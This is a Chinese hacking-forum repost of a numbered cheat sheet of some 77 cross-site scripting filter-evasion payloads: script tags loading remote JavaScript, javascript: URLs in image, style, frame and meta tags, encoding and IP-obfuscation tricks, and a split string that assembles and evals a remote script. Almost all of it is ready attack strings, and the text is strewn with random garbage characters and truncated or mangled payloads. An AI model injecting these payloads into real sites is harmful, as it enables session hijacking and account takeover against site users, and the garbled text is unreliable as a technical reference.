貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。5 C( q: x6 M& [' T9 A
(1)普通的XSS JavaScript注入/ b, j& O& j! V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; z/ _0 r9 c0 a# H. L
(2)IMG标签XSS使用JavaScript命令+ V7 |' f9 w5 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 Y6 @4 u" e0 m, L% c
(3)IMG标签无分号无引号5 }, g. S2 Q+ d+ x# {0 @8 z
<IMG SRC=javascript:alert(‘XSS’)>9 H( i* o% N- ]# ~2 o
(4)IMG标签大小写不敏感1 X& i% @) |( S! b
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>8 x( w* A+ f9 s' a( E; v1 l, u
(5)HTML编码(必须有分号)" F7 s/ O) H& A6 i9 x5 A* \/ g7 Y6 u+ M
<IMG SRC=javascript:alert(“XSS”)>$ Y U. y1 [* {$ U
(6)修正缺陷IMG标签9 p2 F: f! ?" m8 n/ t; S# K
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>8 L K+ i) j5 r5 S6 r0 |8 y
+ G, ]; i. h: H# u$ j- S% e
# n* f R4 p/ u: Z1 y(7)formCharCode标签(计算器)
4 d: }$ D$ @" q9 J<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: Z; l \# ^: v: `
(8)UTF-8的Unicode编码(计算器)& n* e3 K5 S; ]
<IMG SRC=jav..省略..S')>; p4 y& t- L2 d
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)1 t1 k Q$ K" o( g8 c
<IMG SRC=jav..省略..S')> @& k2 T# L. ]: O' B: V
(10)十六进制编码也是没有分号(计算器)
2 k- N# b( h! L2 o: s9 u9 t" v6 V<IMG SRC=java..省略..XSS')>1 q4 ^0 Y; G4 Y
(11)嵌入式标签,将Javascript分开
+ O! F& U8 c/ q! V8 {* H<IMG SRC=”jav ascript:alert(‘XSS’);”>% f% S# j& G& }4 u) `2 r3 T5 q$ X
(12)嵌入式编码标签,将Javascript分开" ^% t# R2 z7 P7 o) t1 \
<IMG SRC=”jav ascript:alert(‘XSS’);”>' P5 O0 I3 ] I: r+ z: _8 _
(13)嵌入式换行符/ Y* L% n5 i# s# }& h+ {+ d% C
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 F5 e" v8 }6 P2 {. B
(14)嵌入式回车0 c3 g9 Y+ v6 r. N; A$ I
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' B- E- E# R1 y# l9 [. j* q(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) f& Z y- [6 C0 _+ M; X<IMG SRC=”javascript:alert(‘XSS‘)”>+ m$ \, k1 @% ?
(16)解决限制字符(要求同页面)
! Z# Q9 d2 n" q1 V% k<script>z=’document.’</script>3 d5 w, b# e8 V3 {- A' O" x9 b( n
<script>z=z+’write(“‘</script>
) R5 L9 ]- G8 ^8 T p. i4 O: Z<script>z=z+’<script’</script>
# o5 V6 O1 `% M: {$ e<script>z=z+’ src=ht’</script>" g9 i* b7 a3 t, w( g
<script>z=z+’tp://ww’</script>( }) |( C& G: P6 a: Y% i
<script>z=z+’w.shell’</script>% ~/ N9 D1 g, j8 L/ C; i3 M: t
<script>z=z+’.net/1.’</script>
) u: I& q, o% c! o$ p1 `2 W- e<script>z=z+’js></sc’</script>
9 @) L3 p) c! u1 \+ k% T/ x<script>z=z+’ript>”)’</script>" C v) c/ {. f5 w9 p
<script>eval_r(z)</script>: h1 ^; M. b- F) {; j% k
(17)空字符12-7-1 T00LS - Powered by Discuz! Board2 P/ \! q: B8 [: m$ T+ K2 ?
https://www.t00ls.net/viewthread ... table&tid=15267 2/6! ]" F M8 q, f$ i. w9 Q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 T0 T5 P3 j& V9 P8 S9 c(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 e; O4 t" D- a
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ ~$ ^' L- D Q(19)Spaces和meta前的IMG标签1 H6 F. x0 r2 n+ i% U
<IMG SRC=” javascript:alert(‘XSS’);”>
# S2 E8 q5 b! m& @ |6 p3 u0 T(20)Non-alpha-non-digit XSS
4 C5 |- U/ U0 E, |2 [) u; ~<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( x; {/ j( O8 w' m(21)Non-alpha-non-digit XSS to 2- u7 {7 }1 E" ^9 I B7 ?$ `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 w( J& I6 {- g9 f3 L6 @
(22)Non-alpha-non-digit XSS to 3; c9 s, p. b/ P1 u( _
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ D% s& n$ u# L- n- r(23)双开括号
. n7 S: |) A3 n% ~2 x<<SCRIPT>alert(“XSS”);//<</SCRIPT> L8 b2 O0 u! q+ J' s' J8 i
(24)无结束脚本标记(仅火狐等浏览器)
9 D- \( ]! i+ s- _<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! w$ Y c7 D N, [, k8 y$ U' p(25)无结束脚本标记2
* y6 Z1 n5 U0 B3 C<SCRIPT SRC=//3w.org/XSS/xss.js>
# [6 p% D7 F" f0 Q(26)半开的HTML/JavaScript XSS, z2 e; z" V5 P* W: i
<IMG SRC=”javascript:alert(‘XSS’)”! B" Q8 S X: O9 Q) n
(27)双开角括号( o- ?+ B) r5 l$ K* |* j h+ e
<iframe src=http://3w.org/XSS.html <% _0 V4 S: |) `. `
(28)无单引号 双引号 分号: O, l1 g6 s/ N" h
<SCRIPT>a=/XSS/
$ p) G+ X3 w( S; s: B' y: Zalert(a.source)</SCRIPT>
* p) j: S9 e! j(29)换码过滤的JavaScript
. i; j, [; p& l5 f$ P\”;alert(‘XSS’);/// I# I' C& X$ U* Q! z
(30)结束Title标签
1 V6 c" p" F, N7 s</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>- n7 Y+ f) @9 ^+ Q2 Z O. x
(31)Input Image
, ], h: X$ q4 c<INPUT SRC=”javascript:alert(‘XSS’);”>- _) c: |/ N1 S- [2 Z' f% r
(32)BODY Image
) p n0 E9 Z W; w1 o<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 X+ P. d; _; m: k6 s& [
(33)BODY标签
1 ?: w: |' t1 m* ?4 j! u4 R r<BODY(‘XSS’)>* ]6 Z( [1 ?6 e+ K2 S* v4 _- |
(34)IMG Dynsrc) L8 o# f' ?) B' H% c t
<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 D. T0 y: o" ?
(35)IMG Lowsrc4 f7 e% b) p$ a; q a* x# h& ^
<IMG LOWSRC=”javascript:alert(‘XSS’)”>( V5 Z0 ]* ?4 D/ m" p
(36)BGSOUND% f' |4 p% s0 C* G
<BGSOUND SRC=”javascript:alert(‘XSS’);”>! }! t) w3 B. \; N: G# h( c+ n
(37)STYLE sheet
* u2 N* n- n2 _, X& w+ G: H<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; }$ y9 i- v, D0 U
(38)远程样式表
1 Y( q) T d! {0 c) T# ?" i: Z<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ O" t: J# S3 I/ g
(39)List-style-image(列表式)! [: b$ s, {; J6 D
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ P& H+ K2 G$ e' J$ D4 {/ h7 M(40)IMG VBscript: E6 q+ o% Z, R- d
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS5 A- J# p% T+ \3 N0 Y% A
(41)META链接url- e1 p' ]; m7 {
v7 ?- b( k# l7 ?. _* h$ t
8 `, N+ X1 m) D<META HTTP-EQUIV=”refresh” CONTENT=”0;" Q" w3 }1 f4 Q5 I
URL=http://;URL=javascript:alert(‘XSS’);”>% \7 A4 i1 G! S6 N1 M' f- y8 s& p
(42)Iframe8 M7 u" |0 M1 R) t
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 e$ k7 J k* \- r. t l7 f(43)Frame5 H* {, |( v6 b% t2 C
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
: P/ k3 N2 ^" r. S3 W: @+ J. e& E+ rhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
% s+ G3 H1 Q" [(44)Table4 D# L, Y6 a" J) c- w8 {0 ?, H
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 a1 w8 B5 {" M" y$ F# K5 Y(45)TD
3 `! W1 H9 I# N6 \7 \0 A<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. _- h" S& L6 Y(46)DIV background-image& D" h1 d: F! u4 S$ k# b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! r7 U; I, e+ D0 ^& i, G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
0 v3 H9 u* e; S/ i9 {2 ?/ e* C8&13&12288&65279)* u l6 I( i# [2 }- o0 {' h
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) O6 y" j( u2 I7 n" |
(48)DIV expression- z' s/ z. U/ s/ {5 r5 r( D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, R6 D4 l( C- t R(49)STYLE属性分拆表达' j/ q7 A# V' m2 S) n( W
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
g0 G4 n0 Z. n- y(50)匿名STYLE(组成:开角号和一个字母开头)
. I% t( B) L' J, H<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( _: w/ F; s+ M4 I" x' T" `(51)STYLE background-image& l9 y. e+ |" g( @* c. V: q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A8 r4 q' {# J+ w$ D5 O3 H
CLASS=XSS></A>( t/ N( Z% Z! U3 u0 J( t
(52)IMG STYLE方式
5 n4 [+ I( P3 G7 Nexppression(alert(“XSS”))’>
2 F) N* b. f3 B, C) O2 X8 ?+ U(53)STYLE background
8 G( Y' w" R9 Y- }& `# J8 r' ?, V<STYLE><STYLE( k& s2 u" p9 \8 {
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>( B7 Z: ~1 ~3 o( N2 h
(54)BASE$ q0 Q8 U$ U5 m. n$ n/ l
<BASE HREF=”javascript:alert(‘XSS’);//”>1 q! w& [% B9 g1 Q z+ h1 S& I& {2 p
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 o& G9 w1 F9 @$ v5 [$ J<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>8 C( L7 Y) n+ a4 z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 |$ @0 L# l+ @, z) @' B. t: q) ja=”get”;
. Z+ h3 @6 D2 J; F2 p$ d& M# ?. Pb=”URL(\”";: O8 j& e7 o9 c) N& q
c=”javascript:”;* X6 ^3 A) F# G& k* A+ [
d=”alert(‘XSS’);\”)”;* x/ r0 B( O9 r6 D3 ]) r! R
eval_r(a+b+c+d);
! P) ^$ X/ V7 G1 e7 }(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上4 | }! Z" U- @$ Z9 B: L
<HTML xmlns:xss>
( V( [+ F5 g6 v<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 x K* P0 o+ R: K! ]/ b. Q9 J
<xss:xss>XSS</xss:xss>
6 q3 n4 @! r3 L3 A/ x</HTML>
: w% Y1 w' E4 y% z& z& z: I8 N0 f7 \" ^(58)如果过滤了你的JS你可以在图片里添加JS代码来利用 E- t' p e: I$ R/ O
<SCRIPT SRC=””></SCRIPT>
1 `, W4 B6 D( Y- I; O) H" Q- p(59)IMG嵌入式命令,可执行任意命令
' ?5 C, M1 T m" n4 |( f<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# i' z* Y7 s( f9 f1 |(60)IMG嵌入式命令(a.jpg在同服务器)6 o# N& \+ p, a z8 W/ T
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser4 N* v0 j$ P. U% z3 `* I2 a
(61)绕符号过滤8 ^: i8 o; n: ` a' F' r7 h4 ~
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; f- J$ z, I) q; B* h; W& L+ K# Q(62)
% r: k4 b S; ~- b<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ |0 E' N& |/ c
(63)' B/ [/ p0 b% s9 |3 R" N2 A- Z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 v( j9 l' g5 J7 S
(64). U4 W' [" }& {/ Z2 ^. `
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
. q6 D) o4 W: o* m(65)- Y. x9 \3 m2 y1 O8 X3 n
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
8 v% P) l& ]/ A1 @1 E& R(66)12-7-1 T00LS - Powered by Discuz! Board
2 j/ d4 u, e& w+ T' W" l! r2 zhttps://www.t00ls.net/viewthread ... table&tid=15267 4/66 n7 J; ?( u/ v+ Y& w+ y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( ^6 n6 m: F6 S- |. g
(67)
1 ]: p9 g2 O' J. p9 ~<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
% \& K, u; o8 m* T: D9 X</SCRIPT>+ ?, d- c7 }% P7 K3 n
(68)URL绕行4 I, @$ q' C' S
<A HREF=”http://127.0.0.1/”>XSS</A>0 Q I6 [$ j# l: Z
(69)URL编码
4 f/ Y5 P( w7 }( u( a; `# G<A HREF=”http://3w.org”>XSS</A>* Z4 n1 P9 V! i. h a
(70)IP十进制1 p/ o$ A3 b5 n- C9 `6 Y# Y5 x: M
<A HREF=”http://3232235521″>XSS</A>
4 m, h# U0 g% t, C" @0 A& F7 x(71)IP十六进制# b& ^7 |# s H$ |
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>- M4 w& J0 B8 W) a$ X+ O/ R. ~
(72)IP八进制) P7 i: }# G) k5 m# i
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
% O% m D% h8 [$ J2 U5 Q8 d" `( J1 R(73)混合编码
5 L5 B- ~4 D6 C+ M/ i/ k) U<A HREF=”h- h+ J% W& j7 l8 S
tt p://6 6.000146.0×7.147/”">XSS</A>
) l1 `: o% `' u7 a% D% Y(74)节省[http:]
& n+ p& z/ }) E8 L9 U; V<A HREF=”//www.google.com/”>XSS</A>( K; U9 \- i# ^$ O4 K- t
(75)节省[www]8 ^$ f- T0 ]* H% Y
<A HREF=”http://google.com/”>XSS</A>
A" C: G1 W! m1 E. `$ A(76)绝对点绝对DNS6 S# \( Z' X" s3 j8 I
<A HREF=”http://www.google.com./”>XSS</A>$ }2 e0 s1 ^& m I+ u# }: k0 z% n
(77)javascript链接( r+ D% D9 N; }! n
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
. f; t" h. u4 W& i1 J5 r H! m6 c6 W9 c& ?
原文地址:http://fuzzexp.org/u/0day/?p=14
0 _' i' U: V1 o8 K( l
; y) c0 z) ~+ u |
发表于 2013-4-19 19:22:37
收藏
支持
反对